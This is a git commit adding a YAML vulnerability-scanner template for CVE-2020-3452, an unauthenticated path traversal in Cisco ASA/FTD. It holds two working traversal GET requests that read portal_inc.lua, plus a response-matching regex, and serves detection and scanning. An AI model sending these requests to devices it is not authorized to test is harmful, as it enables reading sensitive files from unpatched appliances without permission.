Merge pull request #71 from wallarm/feature/cisco-cve-2020-3452

MKirichenko-Wallarm · web-flow · commit cce83b8910e4 · 2020-10-15T17:01:32.000+03:00
CVE-2020-3452
diff --git a/CVE-2020-3452_Cisco_ASA_FTD_PTRAV.yaml b/CVE-2020-3452_Cisco_ASA_FTD_PTRAV.yaml
@@ -0,0 +1,22 @@
+send:
+    - method: 'GET'
+      url: '/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
+
+    - method: 'GET'
+      url: '/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
+  
+detect:
+  - response:
+    - body: '--\sCopyright\s\(C\)\s2006-2018\sby\sCisco\sSystems,\sInc'
+
+meta-info:
+  - title: "Unauthenticated file read in Cisco ASA/FTD (CVE-2020-3452)"
+  - description: "A vulnerability exists in the web service interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software that allows an unauthenticated remote attacker to send a crafted HTTP request to the affected device. By successfully exploiting the vulnerability, the attacker can perform directory traversal attacks and read sensitive files on the target system."
+  - additional: "For more information see https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86"
+  - type: ptrav
+  - threat: 75
+  - applicable_for: 
+    - scanner
+  - tags:
+    - CVE-2020-3452
+    - Cisco
